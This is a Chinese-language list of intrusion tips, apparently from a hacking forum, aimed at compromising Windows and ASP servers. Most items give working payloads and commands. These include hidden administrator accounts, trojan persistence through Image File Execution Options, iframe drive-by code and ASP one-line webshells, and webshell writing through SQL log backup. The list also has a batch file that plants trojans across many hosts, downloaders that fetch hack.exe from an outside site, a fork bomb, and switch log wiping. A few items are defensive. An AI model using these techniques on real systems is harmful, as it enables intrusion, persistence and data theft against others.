Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
5 y4 [) S8 `1 z, F' S# t8 v1 tcacls C:\windows\system32 /G hqw20:R
" J& a& Q: F8 W1 x9 O思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入8 h9 I. D G* a
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
* J5 v3 j+ N; O! a6 X$ y& r" y" g% H6 z1 n7 V) j
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。& h) d: _$ s. W/ Z9 L
: S6 }! v8 m# i0 D6 F
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
0 j3 ?2 w) ^. u$ R, A/ m3 y A3 O. L+ C3 \4 C
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号' h; t% d' n$ ^: l: m. k% R3 S
9 L2 n& L% h* g3 d. N4 F) Z7 _/ ~5、利用INF文件来修改注册表+ q: @. t% j2 K" @" J5 n
[Version]
1 J- d" i6 T) [3 dSignature="$CHICAGO$"3 J+ c, s% m9 I, \- W. w- v4 \
[Defaultinstall]$ {4 A# h8 o4 r2 p6 q/ d- R
addREG=Ating
( r0 F3 `8 ]. `1 n9 y/ \[Ating]( W0 k# ]; j" e# r0 F# X
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
, F/ w7 A/ P, N; ^- C5 D以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
; o) h% F! O; E% ~rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
' I5 T0 `0 d$ G9 b' u其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
6 R( m! Q) A: ?HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
$ X1 ?: i& t2 C. u! z( U5 [HKEY_CURRENT_CONFIG 简写为 HKCC
* h: E. Q) Q& B( K1 }+ F0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值- D) S4 j- G7 F% o2 x
"1"这里代表是写入或删除注册表键值中的具体数据2 P& z: f# j- X$ l
9 a; c, w2 G8 r8 A6 W w7 e* @6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,9 g8 G/ L) l9 o( r
多了一步就是在防火墙里添加个端口,然后导出其键值
# }& v% L$ [! ^, H3 k[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]! p7 ^' T# O% }6 ~
/ d5 o8 C( ~& I+ v
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽1 G/ I4 C7 _$ Z! U% C' [9 C& ~
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。- Q: m+ k% |# I M
( q$ O7 d9 S* V6 @9 `. d) i& D- C4 Q8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
9 `% K4 F" B4 T' x$ @0 T8 @- w% t2 K6 t$ X! T
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
! R2 D% ^, V( U4 \" V. ^- f, q- s1 `可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
$ _8 W2 S+ @- K5 C$ \6 n
& d$ W, B9 y3 ]' c3 k y10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
$ Q" D3 P, B0 m. ~; i. ~
; w" L) w+ k8 g ]$ |/ p/ q. `11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
9 }3 w: E6 X; a1 g' E用法:xsniff –pass –hide –log pass.txt+ ~0 w& ]; k M D: ~! P7 m, T
& t. _" U4 Q" W2 [' ~12、google搜索的艺术
$ N* Z1 t8 u% F5 A搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
* C0 B: M u2 O S9 x- k或“字符串的语法错误”可以找到很多sql注入漏洞。7 H1 v3 q0 i5 M9 N8 F9 ?6 f3 F
/ S8 e; Z& Q& w1 w! N1 s$ T
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。0 j$ b6 J7 X3 }! z" `
- j5 I* ~/ W( ^* Y F: `, y2 m- P( k
14、cmd中输入 nc –vv –l –p 1987
7 T0 X T2 _- E6 z% t3 m# m做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃. {/ J9 m0 c- C; N2 I9 T
: P, C# Z6 K! j15、制作T++木马,先写个ating.hta文件,内容为- d/ R0 y6 \1 ?7 O; G1 u" c I
<script language="VBScript">, _9 x4 V$ y- S6 U& |7 g6 c
set wshshell=createobject ("wscript.shell" )
9 q% g/ T+ J/ {1 E! U* Y/ H- va=wshshell.run("你马的名称",1)
& w4 W$ z/ ~6 nwindow.close$ t2 t3 T# }, |8 d6 N1 k6 O
</script>6 O1 ]3 p. O4 D) V
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。' s, C0 o! O3 @9 }# w6 V5 }0 t
q" Q' ^. Q9 ~
16、搜索栏里输入* b. \0 u j' T/ D, r: k
关键字%'and 1=1 and '%'='% C& X7 q" h+ |; v6 V
关键字%'and 1=2 and '%'='
1 q0 K5 ~: h. x( A; }" `比较不同处 可以作为注入的特征字符" `; Y6 D/ N8 [# }0 G8 Z) a
& ~+ U# V; d8 L/ k. C+ L
17、挂马代码<html>, k0 Y! `) _$ ^# z3 a+ z
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>$ |$ H2 y, O5 n g) v
</html>: @0 v7 e# b# N! v5 H( {
' H- n: V$ S) _" [1 @5 I18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆, f$ F6 G& r; g4 Q3 l# R; \8 o
net localgroup administrators还是可以看出Guest是管理员来。
0 Q- a+ M! Q# R: D8 @: E. n8 X' d/ T; i4 R2 h* K% V
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
: P6 b- D) F+ T3 {, a用法: 安装: instsrv.exe 服务名称 路径
3 u8 P! B+ Z# U* \卸载: instsrv.exe 服务名称 REMOVE; X$ r" n# A( |& z7 x) M0 ~
`/ M' n# N6 W& A, r% J
) i6 e8 F- N! X21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
2 F/ O- B% W+ z- h不能注入时要第一时间想到%5c暴库。# ^" O* u( r$ |2 l
; y4 S# M: f4 l& q! [2 m
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~/ U1 N0 P, f9 J
! y; E7 [2 t9 X( _* W23、缺少xp_cmdshell时
2 ^) J3 x- i( \( o! `& I尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
1 A' v0 R) f% ~; h' X) w+ C- X假如恢复不成功,可以尝试直接加用户(针对开3389的)
# p" f4 c s! E1 Tdeclare @o int& @5 D1 O4 H$ K0 a) s2 e2 c
exec sp_oacreate 'wscript.shell',@o out' a8 J- E; f2 Y. u
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
/ D7 K9 H0 y+ g" L, t% R) [
9 ~+ J! Y; d3 Q3 n" |24.批量种植木马.bat; R' C9 h1 X* G
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
, b$ V7 k* D0 n' Mfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间: N; c u2 T/ c$ V
扫描地址.txt里每个主机名一行 用\\开头
( e# r6 i8 b; c1 e2 n+ M" p
, b ?) ?" H8 ?0 ~25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。& Y j$ v" x! Q5 p# f0 n3 p$ N
! x- [7 k, L- \% _# k2 ^! a26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
/ `6 Z! P$ J+ }6 F( O将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
% w5 U/ N0 e; o3 L.cer 等后缀的文件夹下都可以运行任何后缀的asp木马4 P/ G0 D; r$ G
4 R( }/ _/ {" `, |. A! b
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
T/ v% @& H& b4 A. b( u4 N然后用#clear logg和#clear line vty *删除日志
' _ m! J4 D) v8 B7 w* j* e6 F2 i4 i1 P! o' |
28、电脑坏了省去重新安装系统的方法
) l; F2 X2 t, Q; c z0 Z& z0 b纯dos下执行,, q7 e, S; e5 M7 g
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config! \; m6 ^' W, b
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
, B0 H! E, A: o5 F5 X( P9 J2 F( X% W5 k- c# }; L% g$ A3 z
29、解决TCP/IP筛选 在注册表里有三处,分别是:. ^1 x5 V p# c; T# Q
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
. x- E8 y3 k4 ^, \: S" [* YHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) H% J& W, _% T5 Q9 F' uHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip& ~0 e' y/ E* K! y
分别用' w* r2 ^8 N+ b# w0 G4 q! i
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! r0 z# z G) c; ], ]# D, E
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
3 N" T K O5 R( M5 pregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
6 a! G9 L9 C& v& k9 S命令来导出注册表项
8 P! ]5 u7 d9 Y9 ]- `4 B然后把三个文件里的EnableSecurityFilters"=dword:00000001,
1 r7 t' k* w5 r- g7 E改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
) J7 u) H* Q% a2 S2 _regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
& N0 k) h# |' y$ T4 J" y, I5 ?' w& d* a
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U! n: ^( y, _- K3 m$ I. B6 n: I
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3. l( D* J* V5 F; x4 D: F4 k; j/ q
: @9 I6 e- o9 j
31、全手工打造开3389工具1 X) s" F* M. a: y
打开记事本,编辑内容如下:
0 B; z0 T% K% e% G* E, _7 Wecho [Components] > c:\sql- H* Z( K& }3 ?# S. j" a2 E
echo TSEnable = on >> c:\sql* D6 q3 f8 e' K' L' Q# X
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q) h+ h" G+ V* x; V
编辑好后存为BAT文件,上传至肉鸡,执行- }* H0 m9 f8 B8 t$ ~- V
3 ^3 k4 T$ M: w# q" g. @1 b6 w32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马4 F0 _# Y# \+ U8 B+ w& o: X
1 a" G4 P2 Y6 [; }" Q
33、让服务器重启
9 a( y2 ^; f( e/ I, A2 F7 x9 k& y1 D写个bat死循环:3 `( p7 G7 O3 C! v; q* e; o+ h
@echo off1 p& }0 L8 f6 K' ^6 [
:loop15 o+ }0 K, i- {7 q% `- ~+ L1 v
cls) {) j% _. d* n. F# K
start cmd.exe
4 `$ q6 v$ T: z6 u+ ~6 h; ]4 E' d5 ?goto loop1
+ [3 u* |# [6 \! }6 Y保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
9 C- G- y: D* m: g }& W
! q9 r7 U1 H6 j34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,6 P2 X# N; S! l6 W @
@echo off: S5 H E7 Y% {; {3 _ e# L: p
date /t >c:/3389.txt' l2 {/ Q5 [4 B% N0 ^
time /t >>c:/3389.txt
3 O" X& C [7 k* L2 rattrib +s +h c:/3389.bat
, G4 {, y3 y m0 @% _: `attrib +s +h c:/3389.txt
; r' F2 O# S4 Y1 Y8 T |. [netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt3 R$ W; R5 k% f- N: R) ?* w8 `& `3 Z
并保存为3389.bat8 l$ v$ d* D+ A* x3 D/ @) B6 R0 J
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
" b, O2 `. {/ P' ]3 H3 w' s! F5 l2 F
35、有时候提不了权限的话,试试这个命令,在命令行里输入:% w6 A i) w/ t- f
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)+ \7 a$ I+ k9 T) f! x
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
" N- q. r' t' c. |1 x, [4 i
& C/ h- }( s; ^4 f: {$ u( L36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件. \4 y: H' X# Y: ~& O
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
3 n; v: C4 l( p+ Aecho 你的FTP账号 >>c:\1.bat //输入账号; }- m7 n( y, ]# u9 L
echo 你的FTP密码 >>c:\1.bat //输入密码
) a) i7 H8 k, y# p0 Techo bin >>c:\1.bat //登入
9 d! ]( e1 E7 \echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
, E* z1 M& F1 U9 C+ ^! Z( u- d, secho bye >>c:\1.bat //退出* V0 Z6 x, K. i6 |
然后执行ftp -s:c:\1.bat即可
8 B- X# A+ m! @. B
. D3 q v: T& a$ e37、修改注册表开3389两法
# `/ Z. Z) F* A2 j& ](1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
7 Y' b% C! R- L( V& [) Y7 d/ yecho Windows Registry Editor Version 5.00 >>3389.reg9 j! d% Q, y/ b( G8 j- k& {' d
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
5 ~ u, V# O0 B) b4 Z; Vecho "Enabled"="0" >>3389.reg& w* F, s; P9 @* s
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows- l5 C2 u% d" Z D4 o' l) W
NT\CurrentVersion\Winlogon] >>3389.reg' {* O% W5 D: }3 D( b9 M
echo "ShutdownWithoutLogon"="0" >>3389.reg
. e4 U7 `% L- Q& S2 ^0 C l8 Q, vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]' s! R# M$ }) z! Z5 m4 O8 y$ J
>>3389.reg# i4 C X5 ?" t% E3 v
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg0 V' ]7 _ f0 j* O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]' c: O F/ W+ m$ g+ p; i% f
>>3389.reg
5 ~0 a/ V: ^2 K' Decho "TSEnabled"=dword:00000001 >>3389.reg$ L# h1 T/ N7 {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg! u( \/ y* B3 V4 j0 f
echo "Start"=dword:00000002 >>3389.reg
4 }# i3 A& ^$ w. p$ k- cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
* b |# ?7 F( ^$ [" G% b>>3389.reg
: f0 s; K: x9 [- secho "Start"=dword:00000002 >>3389.reg
6 O* Z0 P. J1 L6 f D/ P7 Wecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
. o" X7 S2 O3 n6 yecho "Hotkey"="1" >>3389.reg
- g9 X% J5 g7 L! eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) j2 T( }' ]$ C5 T2 ]2 t
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
; }; \" l* X6 @& }, K7 Lecho "PortNumber"=dword:00000D3D >>3389.reg
, e9 y7 A5 a: ~7 D; d2 Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 V" ~$ \- z9 D" V2 H- ]Server\WinStations\RDP-Tcp] >>3389.reg
, w* q- d3 ?5 h3 Z+ y) O0 becho "PortNumber"=dword:00000D3D >>3389.reg$ O7 C; b/ e9 z
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。8 w- h5 m2 ^) C
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)) T# H" l9 L# A, H, _8 ?
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
) K/ c) D, ^6 y% `' R$ m6 d8 g(2)winxp和win2003终端开启
4 k( S A* R V# P, b; j5 I用以下ECHO代码写一个REG文件:, V4 u$ k o* Z; @
echo Windows Registry Editor Version 5.00>>3389.reg
* x6 ?* c# l! F4 s3 iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- d4 o# t, D) cServer]>>3389.reg% ~" r5 _0 e/ a& N
echo "fDenyTSConnections"=dword:00000000>>3389.reg
: s" f2 L2 U8 d1 e9 @7 z f8 techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal9 v+ m6 Q7 N; R* t+ x+ J/ p" i
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
; T. b& c4 [$ |7 k, N8 Lecho "PortNumber"=dword:00000d3d>>3389.reg
4 F- S0 b6 c# m% R7 J8 F, H, _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ e4 s1 [: a, ?7 T7 w
Server\WinStations\RDP-Tcp]>>3389.reg
5 W7 H+ ` t, e0 i3 ?echo "PortNumber"=dword:00000d3d>>3389.reg t Y% {, c4 t3 C V( w
然后regedit /s 3389.reg del 3389.reg3 h" @+ l ?+ p. {7 n( {
XP下不论开终端还是改终端端口都不需重启
; n# Z5 R. N2 N. @5 b8 Q0 b9 U( v |( s+ z0 e% `' w
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
# ]' b+ e) Y- x* `用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
+ C0 T, i P; q0 u! D- J4 N! H( @5 m( m- \
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
6 @) S" l2 u) z(1)数据库文件名应复杂并要有特殊字符
" C& Q& B) H7 w0 E' G0 I% B7 W(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
$ r. c/ [+ ?# P. w, z将conn.asp文档中的8 C ^9 x0 y: Y* m5 b
DBPath = Server.MapPath("数据库.mdb")6 z7 P6 ]0 F) [0 B$ m. |, F- ]
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
* I/ M* l* Q; o, M6 ~% m' C! b" x s f8 P
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
+ d/ P4 t9 R3 G+ J5 q(3)不放在WEB目录里9 H+ v, _" x; u1 S8 K# z% Y
) ^4 J/ D! ~- z) |' M9 C2 e40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉5 p, g( E8 D4 B$ \$ ]6 H
可以写两个bat文件& @0 B1 C; c0 u# G+ e* _( L( {
@echo off1 J; p7 e! G) H( Y6 I
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
& m/ @$ D# ?& J: k@del c:\winnt\system32\query.exe
7 P3 I, L# W, V3 {7 F# J; ^@del %SYSTEMROOT%\system32\dllcache\query.exe
" B8 V O0 n) N@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
9 Q, T) K7 S7 Y, ]8 P3 D2 N! o0 ~0 n7 Z2 k
@echo off. L1 I ^; A2 I
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe) _0 Q q- I' w6 j" ?
@del c:\winnt\system32\tsadmin.exe) q$ M* N* b; X, `3 P
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
' d& u+ T6 N2 t4 f; M3 j! t1 L+ a4 c+ @( R+ m! M1 l4 S! s
41、映射对方盘符
( u- k6 R1 R* vtelnet到他的机器上,
* Y+ G% E: n0 N8 Q1 H/ N3 nnet share 查看有没有默认共享 如果没有,那么就接着运行
. t- ~ E) B$ S, S- Y4 \* j. Vnet share c$=c:$ J! V$ M4 m" t5 {$ D1 X
net share现在有c$3 k3 t0 l2 |7 E1 z9 ]3 e
在自己的机器上运行
; v0 r: f% ?6 A- Q0 N- wnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
& ~9 a: ~* P3 B) W/ d" m
7 }6 e- Q! f* x; r42、一些很有用的老知识( I) `7 i5 o3 L$ J" y& ?
type c:\boot.ini ( 查看系统版本 )) Z+ C8 E2 ?5 t$ N" v5 h3 @
net start (查看已经启动的服务)# e* H8 y c$ f& z' d
query user ( 查看当前终端连接 )" O# w# h( t9 v$ {4 @
net user ( 查看当前用户 )
$ V* }* c$ ?: ^net user 用户 密码/add ( 建立账号 )/ j8 z+ Y8 I' w! X
net localgroup administrators 用户 /add (提升某用户为管理员)
8 T; |% ^ {8 L* O3 qipconfig -all ( 查看IP什么的 )
( E: k5 f2 Q1 i! Gnetstat -an ( 查看当前网络状态 )5 o; T0 Z' _' I0 O$ p0 i
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
- o9 \3 T3 ?. }4 @2 b克隆时Administrator对应1F4* d9 Z( k4 r0 {$ ?: \: s7 ]0 {# m
guest对应1F5
3 Z6 ~( c3 h% h- ~tsinternetuser对应3E84 K' c- n) v$ ?, x. _
* g; ~& E5 U8 I/ @
43、如果对方没开3389,但是装了Remote Administrator Service
9 i- h, z- R8 X) e2 y& ^3 r用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
9 ^+ U9 V. v6 j( o解释:用serv-u漏洞导入自己配制好的radmin的注册表信息4 F: [7 [ k+ X8 C2 u
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"9 c0 W/ R5 B. ^9 U3 S9 G9 \5 S
/ _$ d; N. h" f* M* t
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
! w' B0 b0 g0 H4 E' u本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口). o9 k% l5 s# s' D1 I+ ]6 D
5 R4 q0 d( t. k7 R% R z j: g4 q
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)5 S( b% }+ U2 m7 p
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open) S T$ M! _1 x: C; D) o
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =5 P9 M" J! Y+ p, \; R
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
# o, p b f. O% W4 n8 H6 F+ ?$ m1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
+ x% d- Z! w& m5 ?, G(这是完整的一句话,其中没有换行符); s# F4 u1 f7 D5 r
然后下载:
* N# L! _7 z+ c9 Hcscript down.vbs http://www.hack520.org/hack.exe hack.exe
+ x+ w. U% b+ ^5 [7 o* |4 q) @+ X5 v$ x$ o `
46、一句话木马成功依赖于两个条件:, k) u! ~+ V* G8 v% f3 c8 P
1、服务端没有禁止adodb.Stream或FSO组件2 R# ^2 w [# l1 k: B. O; P
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
. @9 L' k2 j8 W/ \# A: V* n$ ]! n
6 [- v) O. N K! p47、利用DB_OWNER权限进行手工备份一句话木马的代码:
' O; @- a/ W" U7 \" |;alter database utsz set RECOVERY FULL--# r- K' G4 H3 E/ r
;create table cmd (a image)--
; z- f$ b) K# ~3 p;backup log utsz to disk = 'D:\cmd' with init--
0 g# B0 Q4 Z$ Q;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--/ h! J3 ?( N3 v
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--9 m0 X9 g9 C) G* B4 ~
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
0 B% ]2 N2 W7 F( ~7 p
' N8 W" ~1 {) @9 f$ L0 i: r48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:! D" } V# x6 T+ Z& Q: v
7 b2 J3 M' |6 q用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options) }7 T1 q. S5 a
所有会话用 'all'。) |" A. N- |* z$ l1 o
-s sessionid 列出会话的信息。
' d$ W* o ?* c& ?* Q-k sessionid 终止会话。# a4 e G5 H9 i5 H
-m sessionid 发送消息到会话。
3 }5 O; f, \$ L7 f
( N8 S6 H. D; N/ X* g& }5 mconfig 配置 telnet 服务器参数。9 h$ T& T; l0 N* i# ~) q: |
4 s5 S. ~1 u7 v5 G- c' i$ g% A4 ocommon_options 为:
7 U. k2 [! H% n% d% U( a9 ~. i-u user 指定要使用其凭据的用户1 y! o+ |, E5 V! ]2 Y
-p password 用户密码
/ D, W j+ m' m" v2 \1 l Z. I- r+ |9 w$ p. }8 Q0 ?
config_options 为:
* P' {1 Y& G# R; x: L! G( kdom = domain 设定用户的默认域
# }( i1 l- Z5 |3 H4 k7 tctrlakeymap = yes|no 设定 ALT 键的映射( c5 m/ M) ^5 |% N9 K
timeout = hh:mm:ss 设定空闲会话超时值" v; k$ w! O, D: j2 n
timeoutactive = yes|no 启用空闲会话。
. T8 H4 g9 [' qmaxfail = attempts 设定断开前失败的登录企图数。
& u! i5 z8 B7 ^# I$ |maxconn = connections 设定最大连接数。
+ l5 a. ^4 ~0 [: y* r vport = number 设定 telnet 端口。5 j1 ?: |, S: B3 C
sec = [+/-]NTLM [+/-]passwd. ?$ B. L1 t) k, y5 V/ a" c
设定身份验证机构
; O& ~7 `2 h8 \& X, Y$ u1 Ufname = file 指定审计文件名。+ i w& I) D! ~3 N! w( H5 B
fsize = size 指定审计文件的最大尺寸(MB)。
3 k0 E7 y* K# pmode = console|stream 指定操作模式。# X" ?5 F1 n! w3 _ M/ u
auditlocation = eventlog|file|both3 W6 H& ^2 @. h. r* J' {
指定记录地点+ r! D# d: q! V7 w( u; K
audit = [+/-]user [+/-]fail [+/-]admin1 w: J" G: p! e
+ n" M+ F6 `- r; k* b' B49、例如:在IE上访问:8 C/ i2 J. h4 |" _8 q
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
3 ^9 Q( z4 z9 k5 \6 d# l, bhack.txt里面的代码是:
% l4 ^- n+ f0 @3 C<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
. b, }0 H' J- o3 q7 @把这个hack.txt发到你空间就可以了!
0 w+ M7 \$ f6 V* Y- E) V这个可以利用来做网马哦!
) B g- i! }" m5 Q9 y& @
4 l& I/ W9 W# q% F9 U. K4 ^50、autorun的病毒可以通过手动限制!
0 w% P8 C6 D" ?* u1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
2 B1 L0 F+ }7 b0 C' V% ?2,打开盘符用右键打开!切忌双击盘符~
$ [) A! O! T& \2 M3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!' b% C. c1 E; C/ D1 M6 L7 u
" a0 d* t2 G/ y( {) D! h2 w7 S
51、log备份时的一句话木马:
( a& N" V! N3 ya).<%%25Execute(request("go"))%%25>8 \ m& \% o" w: P: |+ }
b).<%Execute(request("go"))%>3 [ k1 l6 C- u# i
c).%><%execute request("go")%><%" C9 d! o1 ~) }3 i; N" g" H$ K
d).<script language=VBScript runat=server>execute request("sb")</Script>
% J" o5 }5 L8 V( b+ ]6 I& ne).<%25Execute(request("l"))%25>8 g3 N# j3 P' B0 \1 I( z5 \" n
f).<%if request("cmd")<>"" then execute request("pass")%>% i" v* R+ V6 v2 ?* t) u! t1 e
% E1 B, _8 f; j7 {# c52、at "12:17" /interactive cmd
8 E' x; l1 p# r3 x! t1 V% m y执行后可以用AT命令查看新加的任务# K9 S( j% K+ X; u4 R
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
' A1 b+ C8 Q9 |+ m* ]# y. }3 A
Y7 O0 }$ n0 ] p8 v' E* N* ?53、隐藏ASP后门的两种方法
